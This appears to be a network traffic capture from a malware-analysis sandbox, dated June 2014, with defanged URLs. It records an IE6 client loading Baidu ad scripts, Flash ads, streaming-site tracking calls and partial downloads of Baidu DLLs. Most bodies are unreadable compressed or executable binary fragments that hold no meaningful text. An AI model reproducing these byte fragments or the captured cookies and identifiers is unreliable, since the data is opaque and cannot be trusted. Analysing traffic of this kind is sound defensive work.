 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1..........
..sRGB IEC61966-2.1..................................................X
YZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b
.........XYZ ......$.........desc........IEC hXXp://VVV.iec.ch........
....IEC hXXp://VVV.iec.ch.............................................
.desc........IEC 61966-2.1 Default RGB colour space - sRGB............
IEC 61966-2.1 Default RGB colour space - sRGB......................des
c.......,Reference Viewing Condition in IEC61966-2.1...........,Refere
nce Viewing Condition in IEC61966-2.1..........................view...
......._...............\.....XYZ .....L.V.P...W..meas.................
...............sig ....CRT curv.......................#.(.-.2.7.;[email protected].
J.O.T.Y.^.c.h.m.r.w.|.............................................
<<< skipped >>>


GET /cpro/ui/c.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:28:49 GMT
Content-Type: application/x-javascript
Content-Length: 23196
Last-Modified: Fri, 30 May 2014 10:06:06 GMT
Connection: close
ETag: "5388580e-5a9c"
Content-Encoding: gzip
Set-Cookie: BAIDUID=583278F4799BA536EFF7451F3EEADEC9:FG=1; expires=Sat, 13-Jun-15 17:28:49 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Expires: Fri, 13 Jun 2014 18:28:49 GMT
Cache-Control: max-age=3600
...........Zkw.6..._!s.T2.))Mg:...$..d..J........H..U.r.X..w...C.;....
H.888...........,.GE..h...X....|...GI.{K_..[...Z.v...5.../.teZ..".]..4
.z#....[..&IX.O.....6..6..&[.Z...`.#:O............?. ......|....7.?er.
._...0X.oQQ...0..m....Q......Z..BfC.=.A.oh.{.owl)...........L..?`..?6.
..qL\...zf.......3..E..v...|Z...a...b........O....&.K.z.~.....7..2_...
85,k..MR.8-!.v..\..lwBL....U.~.;..c.gr....,d.u....za..D..5.Q..<....
.. ......b)..e.....k..:.1.yAvG..I-.7z:....d..#.yd....$.=.....1....>
&np..KM7....W.;..% B..!|.,..-Apy...K.U..\L...~..YX../.~l.7y.....W.'..y
c.L.2w57h...}.E.f..b.D..L@^[email protected].......*.."..J5J...X5........&KTW.T.T
u..9.X&.... .X..WS|....n/.....:TE..a.;.......wbzWx......H.>.._.....
.`.h.....4......|..?....C.1..<a.'>.g...!.....?..L.B>M..0....u
aX,..Hd.,..).......f...8.|.Bu..sYT...7.....c....aA...g...7,...L^.X.d..
d.q..O.8.,.yf...B....,............{........{.D.....d....p.S.......2"2.
!..P.E..p...<......."[email protected].. .. z.
X.l.4......n.....'..j..\5ck..p.J....t..q.ku........>..ZP...N*9.hy..
.{]...w=]*...<j..e.......'...r8.....8..D...a/r.......C...I?|%?...j.
.....4....@~y.......{6>..P.......X...Wo0f..b]........4....i.-._....
83...U...."-n....wE..../...w'.&`.'[email protected]?.2q.{
...........,K.........b.../.^..a..$.....p.l.k0..s.7.i.0c `.....qz.Z^..
e.D..5.............a...]4J.......H..?..d..6......p..N.`u....m...v..V..
yX_..k.d...*e..3.-.. .q.-R..lW.p....F.. 8.....`...P(..O.b........=.J -
..7.r....x..I.\. ..^.)T.G.".W..7.$..0.'s..q.G.b.....4.N..TZ.Uh...z
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=884736-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:15 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 359872
Content-Range: bytes 884736-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
.M........T$..B..J.3.............................E..(....E...j...M..(.
...T$..B..J.3..T...........................E..x....E...i...M.......T$.
.B..J.3.......X......................E...i...T$..B..J.3............[..
...............E...i...T$..B..J.3............ .................E...]..
.E...........e...E.. i....T$..B..J.3..k..................E...]...E....
.......e...E...h....T$..B..J.3.. ....(.............E...i...T$..B..J.3.
......X....{.................E...]...E...........e...E...h....T$..B..J
.3............2........E...........e...M...H.U.....u..<P...T$..B..J
.3..x...............E...........e...M...H.......T$..B..J.3..@.........
..............E......M...T$..B..J.3.......(...................E.......
...E.P.<I....T$..B..J.3.......`....N....M..8....E.P.....Y..T$..B..J
.3............ ......u..X....T$..B..J.3..............................E
 P.......M.......E...........e...M.Q.5&....T$..B..J.3..0..............
..........t.....T...T$...x.....t...3..........J.3.......8....e........
...E.P.....Y..T$..B..J.3.......h....8..............M..hT...T$..B..J.3.
...............................................................T$.....
........3..D.......J.3..7..............u.......T$..B..J.3.......`.....
[email protected]$..B..J.3............P......E....
.......e...M...]....T$..B..J.3.............................M...g...T$.
.B..J.3..t...........................E...........e...M...\....T$..B..J
.3..3....(.....................M.......T$..B..J.3.......X....{........
..........p....U....u...u...u...u...T$...d.....`...3............2.
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=393216-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:02 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 851392
Content-Range: bytes 393216-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
].U...=.....j..u..u..u.u.h.:....j.........].V.t$.V........Yu..a.......
.....^.W.t$.j..t$.P...........u.........3...t.P.O...Y.............@...
.......D0.. ..._^.j.h@>........E....u....... ....................3.
;.|.;.$...r!......8...........WWWWW.X7...............@...............L
1....t.P.....Y.}....D0..t..u..u..u..........E....Y..........a....8.M..
.E...........E..J.....u..^...Y..D$.V3.;.u......VVVVV........6........^
..@.^.U.....SW.}.3.;.u .....SSSSS........6.........c...W.....9_.Y.E.}.
._.j.SP........;..E.|..W.f....u. G..,......O.V.. .....u.tA.U..u.......
@..........D2..t...;.s....:.u..E.3.B;.r.9].u..E........x..8...........
....G.........W.;.u..].......]..u. [email protected].
.u.........;E.u..G..M......8.u..E.@;.r.f.G.. .?j..u..u...........}....
.9.....9E.w..O....t.f....t..G..E....D0..t..E..E.)E..E..M...^_[..V.t$..
F...t...t..v..v6...f.....3.Y...F..F.^.U..QQ.E.S3.;.VW......8.......9].
.5....u[SSSP..;.u.......P. ...3.......}.;.w......v............3......j
.W.K...;.YY.E.u4..............}.;.w......SSSSS.......E4........E..E..E
.P.u.W.u...;.r.9].u..u...5..Y.j.....".....;.u.9]...O....u..w5..Y.A....
E....u..u......YY_^[....D$.V.t$..~.:W..u..N.....\t.../u..y..t...u.....
...u..@@.......j.V%............n.......YYtGh.6..V.......YYt3h.6..V.w..
...YYt"[email protected]............_^.U..
..4SV.u.3.........FW.E..E..E.........L....."....]..C...........}......
...}.;.......}.;.......}............A...H... .;E......}E..%....y.H...@
u...jd.[....u...l.................]...........}.........E.....%...
<<< skipped >>>


GET /media/v1/0f000DEUfQYMcAovJj_RMf.swf?url_type=1&snapshot=& HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rs
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:01 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 46832
Cache-Control: max-age=31536000
Expires: Thu, 12 Mar 2015 03:41:57 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.,...x....T\......k.h 4......'...ww..VVV.... ............y..L.>.
V.S.W.|.V.]..4 .P.....$.0...?.&.. .lf..*..z........)-]]....=<<.&
lt;....?3....2..1..1..`t..w5.d.w.................=.......U...?h=......
.......................A|[email protected]......@q5. #......
...*...E...s...... ;# ...:....;.;7=........{..C..]...]....`d..........
.._......;.YYx.o..G$P...........su........jn.?.vQ.r4gV5wqps65..N......
'c..jloj.#!.w......U..].].CRL.G...UL..M\...`...a........b.p0u.3.w..6..
.l.../6%g..V....a.pJ..s...ss...*...".&....#.)).....C..{5w.r77.8;...)8.
;..... ....G........I...a.7........7..............)..y0.C...%mf......l
.o-........l......:..)...............?........6.......t.......n..?....
 .....a}..(@[email protected].,..{.....a...aa..QP.....z...8...(.=$TLLTR
 ...................w...........H..F....P....2<BLb......X..g(..(J.4
...............g..ap.0...P...o.1..P...0pp0..p.p.(h.X,..6.<..(..1...
...X`b..I>>.]......&(in..C.....6......K"$./#......t.]..,.<...
"X.(.hh.x.x.....h...C.*...b...O..._...<.C...w.....S5qIj..3..._.....
.. ...%.....-;....v4..A.....#.K......'........N....y ....o..!.y.jR ...
..k.[......x...V...y!"....XeIJ..t.:&.....N...I..g....-H..........t.n..
..|L.i..J......nXb1W...jE....~(.*2=.B.Y#@:...K.......4.)^[email protected]
 q...H.=$...r..o5n.W.....du.....v..._.......0..w.YT....oKIH.<...7..
..G;.....F{..\".....J.....D....j.=C..2...y..W.....h..".^h .x%....j.%..
X...\.......'.l.}..I.....R'.X.f.?/nBA.?|..9I:oh i...._...0~...0.$.(?..
].N,.E-i........i.pa.......K..ag...} .q=....]o`...X...*TIf^0....s.
<<< skipped >>>


GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: sm.fengyunzhibo.com
Connection: Keep-Alive
Cookie: _ga=GA1.2.2131950969.1402680550


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:44 GMT
Content-Type: application/xml
Content-Length: 122
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Mon, 18 Nov 2013 22:03:39 GMT
X-Upstream-IP: 172.16.18.19:8494
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 36596
X-Cache: hit
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
[email protected].......(.N;BJ....I......8..@.^......2...3R......P
?..7..e..0.....B...U.W.G....E.'..1....=.~.w.%g.V........


GET /RequestTiming/rt?cid=693619_1371525642501&host=tv.aiqingzhihui.com&player_type=nor&rd=0.1444191988557577&newrandom=0.0995170371606946 HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/[[IMPORT]]/resource.dl.kukuplay.com/upload/fishrlv31.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: sm.fengyunzhibo.com
Connection: Keep-Alive
Cookie: _ga=GA1.2.2131950969.1402680550


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 934
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: max-age=60
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 0
X-Cache: miss
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
............[..D...J.gp<3...UUU,.......*...d....cB......n.(......H.
 $..U.~.v.x.W`.q....6......{|..........S.s....F$...C.8..:NR.......?~.2
..a.).F..CL.....`..j.O.:HV.[j..iQ.L.}.. ....d}Q.}..M..D1...........g..
.......jI ..{..xu.Z...*[email protected].&<.R.\.....e...w.>...........&]eF
...-m...^7...3.....V..M.0.b).X".Q3jt.......M...SZL......:...L&n...5..!
......9..I.._p.3>4.....y.9...\,....QO..L..#%"e.$Z.....u..1S.h..sY.d
[email protected]..:F.ES.W..g....JDS.}1Q5......F........
.....~....../........<..}b^|'([email protected]..".@@.:...$.i.z..T.
..^,...y.............P.x..t..6.....8......k.O.R.........(..U..ko.H...j
...{j....)[email protected]... .E.......D./...C.F]........NpTiG B...q......
m..w.......=...h\N...Z.7...K.Y..<.......v....#r V....w<......;n.
...OGlz..Q...P?.!.8.0.a..$.a.G.*9..%....C......I.....C#..vz.(..~.>.
...5...>z..W.G...C....zzg....G.f7~...yv...[.?=...fw..z.T.%j.E.#..".
a.......|e.}.C?..h...,5...I.z...=..".^......%..G...HTTP/1.1 200 OK..Da
te: Fri, 13 Jun 2014 17:29:47 GMT..Content-Type: text/html;charset=UTF
-8..Content-Length: 934..Connection: keep-alive..Vary: Accept-Encoding
..Cache-Control: max-age=60..Content-Encoding: gzip..Accept-Ranges: by
tes..Age: 0..X-Cache: miss..Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs......
........[..D...J.gp<3...UUU,.......*...d....cB......n.(......H. $..
U.~.v.x.W`.q....6......{|..........S.s....F$...C.8..:NR.......?~.2..a.
).F..CL.....`..j.O.:HV.[j..iQ.L.}.. ....d}Q.}..M..D1...........g......
...jI ..{..xu.Z...*[email protected].&<.R.\.....e...w.>...........&]eF
<<< skipped >>>


GET /SrcManager/roominfo?cid=693619_1371525642501&rid=null&rd=0.09363483125343919 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; flash)
Cookie: y_id=null
Host: sm.kukuplay.com
Accept-Encoding: gzip


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:18 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0
X-Upstream-IP: 172.16.18.19:8494
Age: 0
X-Cache: miss
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
Content-Encoding: gzip
...........V..LQ.R27522W.Q*.K.M....h~...$....dG.....aJJ.........l3Kc3C
.xCcsCS#S3.#S.C.$N.@.%. ...-,-...M.M.,t...r2......f@5..%).y..%.JV.:J..
).9.%.@...............



GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cp.sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:14 GMT
Content-Type: application/xml
Content-Length: 122
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"245-1384812219000"
Last-Modified: Mon, 18 Nov 2013 22:03:39 GMT
X-Upstream-IP: 172.16.18.19:8494
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 51472
X-Cache: hit
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
[email protected].......(.N;BJ....I......8..@.^......2...3R......P
?..7..e..0.....B...U.W.G....E.'..1....=.~.w.%g.V........


GET /SrcManager/getchannelproperty/693619_1371525642501?fields=sname,lastSplitTime,cname,width,height,output&version=2.2.8.52867&rd=985027.0906463265 HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cp.sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1622
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: max-age=60
X-Upstream-IP: 172.16.18.17:8494
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 0
X-Cache: miss
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
[email protected].\.$.0.4-..I...<..A. j#..,.......Y^$Sr....X.
R{v.gf..ub.imM.L.N.F.xe....8N]..f.Ty..Nd.\..e\..WN.^..U..kk...*d.ig...
w...[Q...MOw..xO..i).5....D...N.f...5...v.R..%- .g.....|..o..^.-..?..e
..n.n~....W..SQf...I..,.:...k.:.K..z..n...L.R.g..r..........5......(r.
.uE..u..v.^.&..L..=.w....b.Q..XX.>..q].P..`.O..../.eNy...&...&...p.
./K./(.V.Wq.Cf.ISU\....D1.^.\s........s.x..C,..LU.......w-...g]...K..7
0oj....L.iH'.,M....)..nMrRY..l.....<...o()[....,.....Q...X..1..u.g[
.T(..CBB..%..T..g.@....;....A...DY;..nx.q .1..S...UP.w=s...P.X!J_$"='.
.8Y...!.h....:Q.w.m.3YT..%1`.b.....=......._h..F.7b..Kw..T|...-...)ut$
..J........\.G..f R.......7..R%#s.u....E..rT8.k.!..6D.^J..B ...S,9....
sU;h...,...vUf&..TE.w.h...e.9|."[email protected]"..,p\.....3.
s...Y..V.J...P.....0...>.mP..7......q..P6_.du.e.}....B.2..].v.xh..x
........l..A.B..8!.;^.v....P.).{..].k-W....._A.....<:4..rEc.C......
.....y&.."........P.2URP..}.X#."..E......bif.8..}.`G.....P{.^a.!.^0.&l
t;.qN#.;..*.&.SzI.?/..g..d..........74K..f4../........A|....(...|..>
;.!..(..w=W....>.T...x5.R..)/.....(1a..B...(g.y.....^E..d...Ah].*A?
...".......B.........(3m...../.|.....h........P..6x.W{..Zu2..f..H..^..
...@X4$.-.r.BM..8..*.$...  .#. .|.yy....i;.i.y>y..h....`.;.<.]..
o....*.U.u......9h.)..0...ep7.y.?.l.) c .C.~...|.EMY...p....{\.D..br.U
?..i~.M.......Q...4..U./}...#.-...".3..W.....Rur.o%~..... ....}.O...x.
..i...Q.)7../......$.5O..Wq^s<1.........2.3.z........J...?.......{_
.]{.K.6.X..........7.}|h...GF..M?..d.)............Yp..#G..w...].;.
<<< skipped >>>


GET /common/scripts/jquery-1.8.3.min.js HTTP/1.1
Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 4.fyimg.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Tue, 28 May 2024 16:25:35 GMT
Date: Sat, 31 May 2014 16:25:35 GMT
Server: pws/1.4.2.9
Content-Type: application/x-javascript
Content-Length: 93636
Last-Modified: Tue, 25 Dec 2012 06:18:50 GMT
ETag: "50d9454a-16dc4"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx39:8107 (Cdn Cache Server V2.0), 1.1 lasi18:4 (Cdn Cache Server V2.0)
Connection: keep-alive
/*! jQuery v1.8.3 jquery.com | jquery.org/license */.(function(e,t){fu
nction _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=
!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-" n.rep
lace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string")
{try{r=r==="true"?!0:r==="false"?!1:r==="null"?null: r ""===r? r:D.tes
t(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}functi
on B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continu
e;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt
(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeT
ype===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}
function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(
e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(
e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep
(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t
,r,!n);t=v.filter(t,r)}return v.grep(e,function(e,r){return v.inArray(
e,t)>=0===n})}function lt(e){var t=ct.split("|"),n=e.createDocument
Fragment();if(n.createElement)while(t.length)n.createElement(t.pop());
return n}function Lt(e,t){return e.getElementsByTagName(t)[0]||e.appen
dChild(e.ownerDocument.createElement(t))}function At(e,t){if(t.nodeTyp
e!==1||!v.hasData(e))return;var n,r,i,s=v._data(e),o=v._data(t,s),u=s.
events;if(u){delete o.handle,o.events={};for(n in u)for(r=0,i=u[n].len
gth;r<i;r  )v.event.add(t,n,u[n][r])}o.data&&(o.data=v.extend({
<<< skipped >>>

GET /common/scripts/DD_belatedPNG_0.0.8a-min.js HTTP/1.1


Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 4.fyimg.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Tue, 28 May 2024 16:26:41 GMT
Date: Sat, 31 May 2014 16:26:41 GMT
Server: pws/1.4.2.9
Content-Type: application/x-javascript
Content-Length: 7019
Last-Modified: Mon, 20 Aug 2012 03:34:15 GMT
ETag: "5031b037-1b6b"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx31:8104 (Cdn Cache Server V2.0), 1.1 lasi18:1 (Cdn Cache Server V2.0)
Connection: keep-alive
/**.* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-i
mage and HTML <IMG/>..* Author: Drew Diller.* Email: drew.diller
@gmail.com.* URL: hXXp://VVV.dillerdesign.com/experiment/DD_belatedPNG
/.* Version: 0.0.8a.* Licensed under the MIT License: hXXp://dillerdes
ign.com/experiment/DD_belatedPNG/#license.*.* Example usage:.* DD_bela
tedPNG.fix('.png_bg'); // argument is a CSS selector.* DD_belatedPNG.f
ixPng( someNode ); // argument is an HTMLDomElement.**/.var DD_belated
PNG={ns:"DD_belatedPNG",imgSize:{},delay:10,nodesFixed:0,createVmlName
Space:function(){if(document.namespaces&&!document.namespaces[this.ns]
){document.namespaces.add(this.ns,"urn:schemas-microsoft-com:vml")}},c
reateVmlStyleSheet:function(){var b,a;b=document.createElement("style"
);b.setAttribute("media","screen");document.documentElement.firstChild
.insertBefore(b,document.documentElement.firstChild.firstChild);if(b.s
tyleSheet){b=b.styleSheet;b.addRule(this.ns "\\:*","{behavior:url(#def
ault#VML)}");b.addRule(this.ns "\\:shape","position:absolute;");b.addR
ule("img." this.ns "_sizeFinder","behavior:none; border:none; position
:absolute; z-index:-1; top:-10000px; visibility:hidden;");this.screenS
tyleSheet=b;a=document.createElement("style");a.setAttribute("media","
print");document.documentElement.firstChild.insertBefore(a,document.do
cumentElement.firstChild.firstChild);a=a.styleSheet;a.addRule(this.ns 
"\\:*","{display: none !important;}");a.addRule("img." this.ns "_sizeF
inder","{display: none !important;}")}},readPropertyChange:functio
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=131072-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:43 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 1076448
Content-Range: bytes 131072-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
..~..F....^..E...........E..1n....u...-..Y.U.....SVW3.9}.t$9}.t..u.;.u
...<..WWWWW.......l......3._^[...M.;.t....3..u.9E.w..}...}.f.F....M
..}...t..F..E....E..............N.......t/.F...t(......;...r...W.u..6.
M...)~..>... ..}..O;].rO..t.V.b.....Yu}.}....t.3....u. .W.u.V.V...Y
P...........ta;...w....M. .;.rP.}..).E....VP.f......YYt).E..F.K...E...
.E.........A....E.......N. .. .3..u.......N. .E...j.hh....vl..3.9u.t)9
u.t$3.9u....;.u .7;........VVVVV........3...l....u... ..Y.u..u..u..u..
[email protected]... ..Y.j.j..t$...........t$.j.j..t$..
..................j.j..t$...........t$.j.j..t$..B........D$...V...F..u
c..I...F..Hl...Hh.N...;.P~..t...l}...Hpu..n......F.;.....t..F...l}...H
[email protected][email protected]...^....y..t..A..`p.....U.....V
W.u..M..Z....E..u.3.;.t..0;.u,..9..WWWWW...............}..t..E..`p.3..
....9}.t..}..|..}.$...M.S...}..~........~..E.P...j.P.~....M...........
.......B.....t...G....-u..M...... u...G.E.....I........@.....$..7.....
u*..0t..E......4..<xt.<Xt..E......!.E..........u...0u...<xt.&
lt;Xu.G..G.........3..u.......N...t......0..f....t1....a......w... ...
;M.s..M..9E.r'u.;.v!.M...}..u#.E.O..u .}..t..}..e...\.]...]....]...G..
.......u...u>...t..}.....w...u,9u.v'.-8...E...."...t..M.....E.$....
......E..E...t..8.E..t..]..}..t..E..`p..E....E...t..0.}..t..E..`p.3.[_
^..U..3.9.$...P.u..u..u.u.hX~....P........].j..t$..t$..t$..t$ ........
.U...=$....j..u..u..u.u.hX~....j..l......].j..t$..t$..t$..t$ .P.......
U....(SV.u..M.......u.3.;.u(. 7..SSSSS..............8].t..E..`p...
<<< skipped >>>


GET /players/players.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: pws/1.4.2.9
Date: Fri, 13 Jun 2014 17:29:08 GMT
